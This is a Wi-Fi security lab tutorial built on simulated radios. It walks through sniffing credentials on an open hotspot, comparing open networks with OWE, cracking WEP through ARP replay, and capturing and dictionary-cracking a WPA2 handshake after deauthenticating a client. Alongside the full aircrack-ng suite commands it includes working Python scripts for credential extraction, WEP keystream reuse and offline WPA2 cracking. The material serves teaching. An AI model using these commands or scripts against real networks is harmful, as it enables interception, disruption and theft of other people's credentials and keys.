WIFI-SO-SERIOUS
LAB 1: Coffee Shop Attack
This lab demonstrates how to perform a passive sniffing attack on an open Wi-Fi network to capture and extract sensitive user data. You will focus on the SweetB-Guest SSID, which simulates an unencrypted public hotspot.
Phase 1: Preparation & Target Identification
Before you can sniff traffic, you must identify the target's operating channel and BSSID (MAC address).
Enable Monitor Mode: Put your wireless card into monitor mode using
airmon-ng start <wlan#>
Initial Reconnaissance: Scan all bands for available networks with
airodump-ng --band abg <wlan#mon>
Locate Target: Look for SweetB-Guest in the output. Take note of its Channel (CH) and BSSID.
Phase 2: Traffic Capture
Once you have the target details, you will lock your card to that specific channel and save the traffic to a file.
Targeted Sniffing: Lock onto the target channel and BSSID and start capturing:
airodump-ng -c <channel> --bssid <MAC> --essid SweetB-Guest <wlan#mon> -w <filename> --output-format pcap
Data Collection: This command writes every captured frame to a pcap-format capture file (<filename>-01.cap) in your current directory, which Wireshark opens directly.
Phase 3: Traffic Analysis in Wireshark
After capturing traffic, open the capture file in Wireshark to inspect the protocols and extract data.
Protocol Hierarchy: Navigate to Statistics -> Protocol Hierarchy to see which protocols are present. On an open network you will likely see HTTP, which carries its payload unencrypted.
Filtering for Credentials: Apply the display filter
http.request.method == "POST"
to find requests in which users submit forms, such as login pages.
Extracting Information:
Locate the POST /userinfo.php request.
Expand the HTML Form URL Encoded section at the bottom of the packet details pane.
In this lab's example it contains the username (uname) "Chewy" and the password (pass) "lava lamp123".
This only works because the form was submitted over plain HTTP. An HTTPS login would show nothing here but a TLS handshake and encrypted records, so the attack depends on the site, or the client, using HTTP.
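The two Wireshark steps above (filter the POST requests, read the form-encoded body) can be reproduced from the raw capture, which also shows exactly what the sniffer sees on an open network. The following Python script is an added example, not part of the lab material: it walks a pcap, follows raw 802.11 data frames (DLT 105, the link type airodump-ng writes) or Ethernet frames through LLC/SNAP, IPv4 and TCP, and pulls the form fields out of every HTTP POST. The capture it parses is constructed inside the script using the lab's example credentials and made-up addresses; frames with the Protected bit set are skipped, which is why the same script would find nothing in the OWE capture of Lab 1.1.

```python
"""Extract HTTP POST form fields from a pcap, as Wireshark's filter
http.request.method == "POST" plus the 'HTML Form URL Encoded' pane would.
Handles Ethernet (DLT 1) and raw 802.11 (DLT 105, what airodump-ng writes).
Added example for the lab, stdlib only; the capture below is constructed here."""
import struct
from urllib.parse import parse_qs

DLT_EN10MB, DLT_IEEE802_11 = 1, 105


def ip_offset(linktype, frame):
    """Offset of the IPv4 header inside `frame`, or None if not plaintext IPv4."""
    if linktype == DLT_EN10MB:
        return 14 if frame[12:14] == b"\x08\x00" else None
    if linktype == DLT_IEEE802_11:
        fc0, fc1 = frame[0], frame[1]
        if fc0 & 0x0C != 0x08 or fc1 & 0x40:   # not a data frame, or Protected (encrypted)
            return None
        hdr = 24
        if fc0 & 0x80:                         # QoS Data subtype: 2-byte QoS control field
            hdr += 2
        if fc1 & 0x03 == 0x03:                 # ToDS+FromDS: fourth address present
            hdr += 6
        snap = frame[hdr:hdr + 8]              # LLC/SNAP header, last two bytes = ethertype
        if snap[:3] == b"\xaa\xaa\x03" and snap[6:8] == b"\x08\x00":
            return hdr + 8
    return None


def tcp_payload(ip):
    """(src_ip, dst_ip, payload) for a TCP segment inside an IPv4 packet, else None."""
    if ip[9] != 6:                             # protocol 6 = TCP
        return None
    ihl = (ip[0] & 0x0F) * 4
    total = struct.unpack("!H", ip[2:4])[0]
    tcp = ip[ihl:total]
    doff = (tcp[12] >> 4) * 4
    src = ".".join(map(str, ip[12:16]))
    dst = ".".join(map(str, ip[16:20]))
    return src, dst, tcp[doff:]


def extract_posts(pcap):
    """Return [{src, dst, uri, form}] for every HTTP POST with a form-encoded body."""
    magic = struct.unpack("<I", pcap[:4])[0]
    endian = "<" if magic == 0xA1B2C3D4 else ">"   # reads as 0xD4C3B2A1 when the file is big-endian
    linktype = struct.unpack(endian + "I", pcap[20:24])[0]
    pos, found = 24, []
    while pos + 16 <= len(pcap):
        _, _, caplen, _ = struct.unpack(endian + "IIII", pcap[pos:pos + 16])
        frame = pcap[pos + 16:pos + 16 + caplen]
        pos += 16 + caplen
        off = ip_offset(linktype, frame)
        seg = tcp_payload(frame[off:]) if off is not None else None
        if seg is None or not seg[2].startswith(b"POST "):
            continue
        head, _, body = seg[2].partition(b"\r\n\r\n")
        uri = head.split(b" ", 2)[1].decode()
        form = {k: v[0] for k, v in parse_qs(body.decode(errors="replace")).items()}
        found.append({"src": seg[0], "dst": seg[1], "uri": uri, "form": form})
    return found


def build_sample_pcap():
    """Constructed capture: one unencrypted 802.11 QoS Data frame carrying the lab's POST."""
    body = b"uname=Chewy&pass=lava+lamp123"
    http = (b"POST /userinfo.php HTTP/1.1\r\nHost: sweetb.example\r\n"
            b"Content-Type: application/x-www-form-urlencoded\r\n"
            b"Content-Length: %d\r\n\r\n" % len(body)) + body
    tcp = struct.pack("!HHIIBBHHH", 51000, 80, 1, 1, 0x50, 0x18, 65535, 0, 0) + http
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 1, 0, 64, 6, 0,
                     bytes([192, 168, 8, 20]), bytes([93, 184, 216, 34])) + tcp
    dot11 = (b"\x88\x01\x00\x00"                     # QoS Data, ToDS, duration
             + bytes.fromhex("020000000000")         # addr1: BSSID (made-up, hwsim-style)
             + bytes.fromhex("020000000100")         # addr2: client (source)
             + bytes.fromhex("001122334455")         # addr3: destination on the wired side
             + b"\x10\x00\x00\x00"                   # sequence control, QoS control
             + b"\xaa\xaa\x03\x00\x00\x00\x08\x00"   # LLC/SNAP, ethertype IPv4
             + ip)
    ghdr = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, DLT_IEEE802_11)
    rec = struct.pack("<IIII", 0, 0, len(dot11), len(dot11)) + dot11
    return ghdr + rec


if __name__ == "__main__":
    for post in extract_posts(build_sample_pcap()):
        print(post["src"], "->", post["dst"], post["uri"], post["form"])
```

Pointing extract_posts at the bytes of the file airodump-ng produced in Phase 2 gives the same result as the Wireshark filter; the 802.11 branch is the part that matters for the lab, because the capture holds raw wireless frames rather than Ethernet.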
Phase 4: Exporting Objects
If the user downloaded images or files over this unencrypted connection, you can reconstruct them.
Export Tool: Go to File -> Export Objects -> HTTP.
Save Files: This opens a list of all files sent over HTTP (images, scripts, HTML pages). You can select individual files or click Save All to extract them to your disk.
LAB 1.1: OWE vs. Open Network
In this lab, you will explore Opportunistic Wireless Encryption (OWE), also known as Enhanced Open. The goal is to compare how traffic looks on a standard open network versus one protected by OWE, which provides encryption without requiring a password.
Phase 1: Setting Up the OWE Access Point
Unlike the previous lab where you scanned for an existing network, here you will create the environment using simulated radios.
Initialize Radios: Load the simulated driver with four radios:
modprobe mac80211_hwsim radios=4
Navigate to Lab Directory: Change to the specific lab folder:
cd /home/rogue1/lab-1/LAB-OWE
Kill any conflicting processes (a leftover hostapd or wpa_supplicant will compete for the interfaces).
Launch the AP: Start the Access Point using
hostapd SweetB-OWE.conf
Verify State: You should see the interface (e.g., wlan0) transition to AP-ENABLED.
Phase 2: Connecting the Client
Next, you simulate a client connecting to this encrypted "open" network.
Start the Client: Use wpa_supplicant to connect another interface (e.g., wlan1) using the OWE configuration file.
Observe the Handshake: Watch the output for
Key negotiation completed
Although no password was entered, the system reports a PMKSA-CACHE entry and a PTK CCMP (encryption key). This is OWE at work: the client and AP perform a Diffie-Hellman exchange inside the association request and response, the shared secret becomes the PMK, and the normal 4-way handshake then derives a per-client CCMP pairwise key from it.
Phase 3: Traffic Sniffing & Analysis
Now, use a third radio to capture the traffic and analyze it.
Enable Monitor Mode: Put the third radio into monitor mode, exactly as in Lab 1:
airmon-ng start <wlan#>
Locate the Target: Scan all bands to find the channel and BSSID of SweetB-OWE:
airodump-ng --band abg <wlan#mon>
Capture to PCAP: Once you have the channel (-c) and BSSID (--bssid), start a focused capture:
airodump-ng -c <channel> --bssid <MAC> --essid SweetB-OWE <wlan#mon> -w <filename> --output-format pcap
Phase 4: Traffic Analysis (The Comparison)
The Key Difference: Compare the ENC and AUTH columns in the airodump-ng output.
Standard Open (Lab 1): ENC: OPN, AUTH: (empty).
OWE (Lab 1.1): ENC: WPA3, CIPHER: CCMP, AUTH: OWE.
Wireshark View: Open your capture file. Unlike Lab 1, where the HTTP POST data was readable in plaintext, the OWE traffic appears as 802.11 QoS Data frames with the Protected flag set; the payload is CCMP-encrypted and unreadable to the sniffer.
Key Takeaway
On a standard open network, any attacker within radio range can read your HTTP traffic in plaintext. In an OWE environment, even though there is no password, the traffic between the client and the AP is encrypted with a per-client key, protecting users from passive sniffing. Note the limit of that protection: OWE does not authenticate the AP, so an attacker who stands up a rogue AP with the same SSID terminates the encryption themselves. OWE defeats passive capture, not an active evil twin.
Clean up
Follow these steps to clear your environment:
Kill Hostapd: Stop the simulated Access Point from the previous lab by running
killall hostapd
Kill WPA Supplicant: Stop the virtual client by running
killall wpa_supplicant
Remove the Virtual Driver: Unload the simulated radio module from the kernel with
rmmod mac80211_hwsim

LAB 2: Cracking WEP
To understand LAB-2 (the WEP lab), start with the goal. WEP encrypts every frame with RC4 keyed by a 24-bit Initialization Vector (IV) prepended to the shared key, and the IV is transmitted in the clear. Certain IVs leak information about the key bytes, so the attack is to collect as many distinct IVs as possible: we capture and re-inject packets to force the Access Point (AP) to send a high volume of freshly encrypted frames, each carrying a new IV. Once enough IVs are captured, aircrack-ng solves for the key statistically.
Here is a step-by-step walkthrough using specific interfaces in a multi-tab setup.
Phase 1: Environment Setup
In your first terminal tab, prepare the virtual radios and start the specific lab environment.
Clean the environment:
killall hostapd wpa_supplicant; rmmod mac80211_hwsim
Start the Lab Script:
cd /home/rogue1/lab-1/
./Lab-r1.sh
Put wlan2 into Monitor Mode:
airmon-ng start wlan2
Note: In this environment the resulting monitor interface is named wlan6mon; use whatever name airmon-ng reports in the remaining steps.
Phase 2: The Attack Walkthrough (Multi-Tab)
Tab A: Targeted Capture
First, list the running networks and note the channel and BSSID of SweetB-WEP:
airodump-ng --band abg wlan6mon
Then lock onto it and write the capture to disk. This tab stays open to collect the "votes" (IVs) needed to crack the key:
airodump-ng -c <channel> --bssid 02:00:00:00:00:00 -w <filename> wlan6mon
Monitor: Watch the #Data column. It counts captured data frames, each carrying its own IV, and you need this number to climb fast.
Tab B: Fake Authentication
We use wlan6mon to "introduce" ourselves to the AP. Without an association, the AP will drop our injected traffic.
Command:
aireplay-ng -1 6000 -o 1 -q 10 -e SweetB-WEP -a 02:00:00:00:00:00 -h 02:00:00:00:06:00 wlan6mon
Command Breakdown
aireplay-ng: The core tool for 802.11 packet injection and generation.
-1 6000: Fake Authentication mode. The 6000 tells the tool to re-authenticate every 6,000 seconds to keep the association alive.
-o 1: Sends only one set of authentication/association packets at a time (works with most APs).
-q 10: Sends keep-alive packets every 10 seconds so the AP does not drop the association for inactivity.
-e SweetB-WEP: The ESSID (name) of the target network.
-a 02:00:00:00:00:00: The BSSID (MAC address) of the target Access Point.
-h 02:00:00:00:06:00: Your source MAC address, i.e. the MAC of the monitor interface you are attacking from (wlan6mon).
wlan6mon: The wireless interface in monitor mode.
Success: Look for
Association successful :-) (AID: 1)
Tab C: ARP Replay Attack
This is the engine. It waits for an ARP request on the network and re-injects it at roughly 500 packets per second; the AP relays every replayed request and re-encrypts it with a new IV, which is what fills the #Data column in Tab A.
Command:
aireplay-ng -3 -b 02:00:00:00:00:00 -h 02:00:00:00:01:00 wlan6mon
Command Breakdown
aireplay-ng: The tool used for 802.11 packet injection.
-3: ARP Request Replay attack mode.
-b 02:00:00:00:00:00: The BSSID (MAC address) of the target Access Point.
-h 02:00:00:00:01:00: The source MAC address to inject with (your own interface's MAC, or that of a client already associated with the AP).
wlan6mon: The wireless interface in monitor mode.
Troubleshooting: If #Data is not rising, the replay has no ARP request to work with yet. In another tab run
ping 192.168.8.5
to generate the initial ARP request the attack needs.
Tab D: Cracking the Key
You can run this while the other tabs are still working; aircrack-ng re-reads the capture file as more IVs arrive.
Command:
aircrack-ng -b 02:00:00:00:00:00 <filename>-01.cap
Expected Results
IV Count: aircrack-ng retries every 5,000 newly captured IVs until it finds the key.
Key Found: When successful, you will see
KEY FOUND! [ EA:BC:DE:F1:23 ]
(example key).
Decryption: It should report
Decrypted correctly: 100%
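The weakness the procedure above exploits is not the key length but keystream reuse: RC4 is keyed with IV || WEP key, the 3-byte IV travels in the clear, and any frame whose plaintext is known hands over the RC4 keystream for that IV. ARP requests have a fixed, predictable header, which is why aireplay-ng -3 replays them and why the #Data counter is the thing to watch. The following Python script is an added illustration, not part of the lab: the 40-bit key (the lab's example value), the IV and the frames are constructed inside it, and it assumes the attacker knows the complete ARP plaintext (in practice the LLC/SNAP and ARP headers are known and the addresses are guessed or recovered by other means). It encrypts two frames under one IV, recovers the keystream from the known one and decrypts the other without touching the key. Recovering the key itself, as aircrack-ng does, is a separate statistical attack over many IVs that this example does not implement.

```python
"""WEP keystream reuse: two frames under the same IV share an RC4 keystream, so a
known-plaintext frame (an ARP request) decrypts any other frame with that IV.
Added example for the lab; key, IV and frames are constructed here."""
import struct
import zlib


def rc4(key, data):
    """Plain RC4 (KSA + PRGA); WEP uses key = IV || WEP key."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for c in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(c ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def icv(data):
    """WEP integrity check value: little-endian CRC32 of the plaintext."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def wep_encrypt(wep_key, iv, plaintext, key_id=0):
    """WEP frame body: IV(3) | KeyID(1) | RC4_{IV||key}(plaintext | ICV)."""
    return iv + bytes([key_id << 6]) + rc4(iv + wep_key, plaintext + icv(plaintext))


def wep_decrypt(wep_key, body):
    """Legitimate receiver: strip IV and key ID, RC4 with IV||key, verify ICV."""
    iv, ciphertext = body[:3], body[4:]
    plain = rc4(iv + wep_key, ciphertext)
    data, tag = plain[:-4], plain[-4:]
    if tag != icv(data):
        raise ValueError("bad ICV")
    return data


# Predictable start of an encrypted ARP request: LLC/SNAP with ethertype 0x0806,
# then HW type Ethernet, proto IPv4, address sizes 6/4, opcode 1 (request).
KNOWN_ARP_PREFIX = (b"\xaa\xaa\x03\x00\x00\x00\x08\x06"
                    + b"\x00\x01\x08\x00\x06\x04\x00\x01")


def recover_keystream(body, known_plaintext):
    """Attacker: keystream = ciphertext XOR known plaintext. No key involved."""
    ciphertext = body[4:4 + len(known_plaintext)]
    return bytes(c ^ p for c, p in zip(ciphertext, known_plaintext))


def decrypt_with_keystream(body, keystream):
    """Attacker: apply a recovered keystream to another frame with the same IV."""
    ciphertext = body[4:4 + len(keystream)]
    return bytes(c ^ k for c, k in zip(ciphertext, keystream))


def demo():
    """Constructed scenario: an ARP request and a login frame encrypted under one IV.
    Assumes the attacker knows the whole ARP plaintext, addresses included."""
    wep_key = bytes.fromhex("EABCDEF123")           # 40-bit key, the lab's example value
    iv = b"\x01\x02\x03"                            # the IV both frames happen to use
    arp_body = (bytes.fromhex("020000000100") + bytes([192, 168, 8, 20])   # sender HW/IP
                + b"\x00" * 6 + bytes([192, 168, 8, 5]))                  # target HW/IP
    arp = KNOWN_ARP_PREFIX + arp_body
    login = b"\xaa\xaa\x03\x00\x00\x00\x08\x00" + b"user=Chewy&pass=lava lamp123"
    frame_arp = wep_encrypt(wep_key, iv, arp)
    frame_login = wep_encrypt(wep_key, iv, login)
    keystream = recover_keystream(frame_arp, arp)   # 36 keystream bytes for this IV
    recovered = decrypt_with_keystream(frame_login, keystream)
    return {"secret": login, "recovered": recovered,
            "iv_reused": frame_arp[:3] == frame_login[:3]}


if __name__ == "__main__":
    result = demo()
    print("IV reused:", result["iv_reused"])
    print("recovered:", result["recovered"])
```

With only 2^24 IVs and many implementations starting the counter at zero on every reboot, repeats are inevitable on a busy network; the ARP replay in Tab C simply makes the AP produce the traffic, and therefore the IVs, on demand.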
LAB-3 (WPA Lab)
To master LAB-3 (the WPA lab), you need to understand the mechanics of the "Deauthentication Attack" and the "4-Way Handshake." Unlike the WEP lab, we aren't generating traffic; we force a connected client to reconnect so we can capture the handshake it performs on the way back in, and then attack that handshake offline.
Phase 1: The Handshake Capture Walkthrough
Tab 1: Targeted Sniffing (airodump-ng)
First, list the available WPA networks and the clients connected to them, if any:
airodump-ng --band abg wlan2mon
Then lock the card to the target's channel and start recording, so the handshake is written to disk when it occurs:
airodump-ng -c 36 --bssid 02:00:00:00:02:00 -w WPA_Capture --output-format pcap wlan2mon
-c 36: Locks the sniffer to channel 36, where the target AP is broadcasting.
--bssid 02:00:00:00:02:00: Filters the capture to traffic involving the target AP.
-w WPA_Capture: Prefix for the output file (e.g., WPA_Capture-01.cap).
--output-format pcap: Saves in the standard packet capture format that both Wireshark and aircrack-ng read.
Tab 2: Deauthentication Attack (aireplay-ng)
Since the client is already connected, we kick it off. When its device automatically reconnects, it performs the 4-way handshake we need.
Command:
aireplay-ng -0 5 -a 02:00:00:00:02:00 -c 02:00:00:00:03:00 wlan2mon
-0 5: Deauthentication attack. The 5 tells the tool to send 5 bursts of deauth frames (0 would send them indefinitely).
-a 02:00:00:00:02:00: The MAC address of the Access Point (target).
-c 02:00:00:00:03:00: The MAC address of the specific client we want to disconnect (victim).
Watch for Success: In Tab 1, "WPA handshake: 02:00:00:00:02:00" must appear in the top right corner of the airodump-ng screen.
Phase 2: The Cracking Process (aircrack-ng)
Now that you have captured the handshake, you attack the passphrase offline: every candidate from the wordlist is run through PBKDF2 and checked against the MIC in the captured handshake, with no further interaction with the AP.
Command:
aircrack-ng -w /home/rogue1/opt/password.lst -b 02:00:00:00:02:00 WPA_Capture-01.cap
Flag Breakdown:
-w /home/rogue1/opt/password.lst: The dictionary file of candidate passphrases.
-b 02:00:00:00:02:00: Selects this network's handshake from the capture file.
WPA_Capture-01.cap: The file you created in Tab 1 that contains the captured handshake.
Expected Result
If successful, aircrack-ng displays:
KEY FOUND! [ password1 ]
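What aircrack-ng does with the wordlist is a per-candidate recomputation of the handshake's MIC. The following Python script is an added example, not aircrack-ng's code: for each wordlist entry it derives PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes), expands it into the PTK with the 802.11i PRF-512 over the two MACs and two nonces, and compares HMAC-SHA1(KCK, EAPOL message 2 with its MIC field zeroed) against the MIC captured in that message. The SSID "SweetB-WPA", the nonces and the EAPOL frame are constructed inside the script (the lab does not name the WPA SSID); the AP and client MACs are the ones used in the commands above.

```python
"""Offline WPA2-PSK check, the core of what aircrack-ng -w does per wordlist entry.
Added example for the lab; the SSID, nonces and EAPOL frame are constructed here."""
import hashlib
import hmac

MIC_OFFSET = 81   # EAPOL-Key: 4-byte 802.1X header + 1+2+2+8+32+16+8+8 bytes precede the MIC


def pmk_from_passphrase(passphrase, ssid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf512(pmk, ap_mac, sta_mac, anonce, snonce):
    """IEEE 802.11i PRF-512: concatenated HMAC-SHA1(PMK, label || 0x00 || data || i)."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    blocks = [hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]),
                       hashlib.sha1).digest() for i in range(4)]
    return b"".join(blocks)[:64]            # PTK; bytes 0..15 are the KCK


def eapol_mic(kck, eapol):
    """WPA2 (AKM 2, descriptor version 2): MIC = HMAC-SHA1(KCK, frame with MIC zeroed)[:16]."""
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def crack(ssid, ap_mac, sta_mac, anonce, snonce, eapol2, wordlist):
    """Return the passphrase whose KCK reproduces the MIC of EAPOL message 2, else None."""
    captured = eapol2[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, ssid)          # the expensive step
        kck = prf512(pmk, ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol2), captured):
            return candidate
    return None


def build_handshake(passphrase, ssid):
    """Constructed 'capture': the lab's AP and client MACs, fixed nonces, one message-2 frame."""
    ap_mac = bytes.fromhex("020000000200")
    sta_mac = bytes.fromhex("020000000300")
    anonce = bytes(range(32))                       # would be read from message 1
    snonce = bytes(range(32, 64))                   # would be read from message 2
    key_info = b"\x01\x0a"                          # MIC set, pairwise, descriptor version 2
    body = (b"\x02" + key_info + b"\x00\x10"       # RSN descriptor type, key info, key length
            + b"\x00" * 7 + b"\x01"                 # replay counter
            + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8   # nonce, IV, RSC, ID
            + b"\x00" * 16 + b"\x00\x00")           # MIC placeholder, key data length
    eapol = b"\x02\x03" + len(body).to_bytes(2, "big") + body   # 802.1X v2, type EAPOL-Key
    kck = prf512(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    eapol = eapol[:MIC_OFFSET] + eapol_mic(kck, eapol) + eapol[MIC_OFFSET + 16:]
    return ap_mac, sta_mac, anonce, snonce, eapol


if __name__ == "__main__":
    handshake = build_handshake("password1", "SweetB-WPA")   # SSID assumed, not from the lab
    print(crack("SweetB-WPA", *handshake, ["letmein", "Password", "password1"]))
```

The 4096 PBKDF2 iterations per candidate are why cracking speed is measured in thousands of keys per second per core rather than millions, and why the wordlist matters more than the hardware. A real capture must also contain at least two consecutive handshake messages with matching replay counters for aircrack-ng to accept it; this example shows only the MIC comparison that decides whether a candidate is right.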